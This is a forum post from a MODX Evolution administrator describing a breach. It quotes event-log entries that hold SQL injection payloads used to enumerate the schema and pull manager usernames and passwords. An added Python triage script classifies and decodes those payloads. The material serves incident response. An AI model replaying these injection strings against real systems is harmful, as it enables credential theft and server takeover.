Today I discovered some new PHP files that were arbitrarily uploaded. I first thought it was the q2a software I am using, but checking the MODX event log plus the manager log, I can see that the attacker came in via MODX Evolution!
After entering the system he uploaded a file, stats.php (https://github.com/echteinfachtv/q2a-various/blob/master/stats.php), that gave him control over the server:
MODx Parse Error entries from the event log (how he entered the manager panel):
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ',(("]]').]' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND 6513=8505 AND ('GsiA'='GsiA' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND 8413=8413 AND ('sRCb'='sRCb' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND (SELECT 2315 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (2315=2315) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Knbe'='Knbe' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 2315 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (2315=2315) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pdru'='Pdru' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''; SELECT SLEEP(5)-- ' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 5530#' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 6#' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 10#' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 5#' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4465 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (8002 = 8002) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Payy'='Payy' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 8664 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xeaz'='xeaz' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6131 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FPmo'='FPmo' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 9887 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XLgX'='XLgX' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 5834 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AEwg'='AEwg' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6947 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 1,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kzfw'='kzfw' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 1761 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 1,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'seHf'='seHf' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4478 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 2,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KLre'='KLre' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 1391 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 2,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PjWz'='PjWz' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6916 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM db348277_7.modx_manager_users),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YArq'='YArq' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4628 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lZHc'='lZHc' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 7605 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yDor'='yDor' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 8409 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZeOE'='ZeOE' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''' LIMIT 1;
Later on the attacker uploaded more files; you can read about it here:
http://stackoverflow.com/questions/17945523/our-q2a-forum-got-hacked-by-ccteam-what-are-these-php-files-doing
http://stackoverflow.com/questions/17946838/has-anybody-heard-about-blackhats-with-kernel-exploits-exploit-enlightenment
http://question2answer.org/qa/26227/hacked-russians-files-include-plugin-theme-folder-discovered
Please help, how can I prevent another attack?
I have no idea which settings the attacker has changed within MODX; can I see full details in the event log?
Thank you!
[ed. note: kajus99 last edited this post 10 years, 8 months ago.]
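To get more out of the event log entries above, here is an added triage script (not from the post and not part of MODX) that parses entries of that form, pulls out the attacker-controlled value compared against the MD5 hash, names the injection technique it shows, decodes the MySQL 0x hex literals so the targeted schema and table names are readable, and lists which columns were read. The sample entries are rebuilt from the logged lines in the post; the regexes and technique names are this example's own assumptions.

```python
import re

# Fixed part of every "MODx Parse Error" entry in the post; only the value after "= '" is attacker input.
PREFIX = ("SQL: SELECT usr.id, usr.username, attr.email, "
          "MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash "
          "FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey "
          "WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '")
# Sample entries rebuilt from the post for this example (payloads as they appeared in the log).
SAMPLE_LOG = [PREFIX + p + "' LIMIT 1;" for p in (
    ",((\"]]').]",
    "') AND 6513=8505 AND ('GsiA'='GsiA",
    "'; SELECT SLEEP(5)-- ",
    "' ORDER BY 10#",
    "' AND (SELECT 6131 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) "
    "FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 0,1),"
    "0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FPmo'='FPmo",
    "' AND (SELECT 7605 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) "
    "FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yDor'='yDor",
    "'",
)]

PAYLOAD_RE = re.compile(r"\)\s*=\s*'(.*)' LIMIT 1;\s*$")   # greedy: payload may itself contain quotes
HEX_RE = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")             # MySQL hex string literals
TECHNIQUES = [  # (marker regex, technique name); assumed names for triage, checked in this order
    (r"SLEEP\(|BENCHMARK\(", "time-based"),
    (r"ORDER BY \d+", "column-count probe"),
    (r"FLOOR\(RAND\(0\)\*2\).*GROUP BY", "error-based (duplicate-key)"),
    (r"INFORMATION_SCHEMA\.(COLUMNS|TABLES|SCHEMATA)", "schema enumeration"),
    (r"AND \d+=\d+", "boolean-based"),
]

def extract_payload(line):
    """Return the attacker-controlled string compared against the hash, or None for other entries."""
    m = PAYLOAD_RE.search(line)
    return m.group(1) if m else None

def classify(payload):
    """Name the injection technique(s) visible in one payload; anything unmatched is a syntax probe."""
    found = [name for rx, name in TECHNIQUES if re.search(rx, payload, re.I)]
    return found or ["syntax probe"]

def decode_hex_literals(payload):
    """Replace printable-ASCII 0x literals with quoted text so schema/table names can be read."""
    def sub(m):
        raw = bytes.fromhex(m.group(1))
        return repr(raw.decode()) if all(32 <= b < 127 for b in raw) else m.group(0)
    return HEX_RE.sub(sub, payload)

def columns_read(payload):
    """Columns the attacker tried to extract, taken from CAST(<column> AS CHAR) patterns."""
    return re.findall(r"CAST\((\w+) AS CHAR\)", payload)
```

Run it over the full set of lines from the event log, not only the sample; the entries that read `password` and `username` from the manager users table are the ones that tell you which credentials must be rotated.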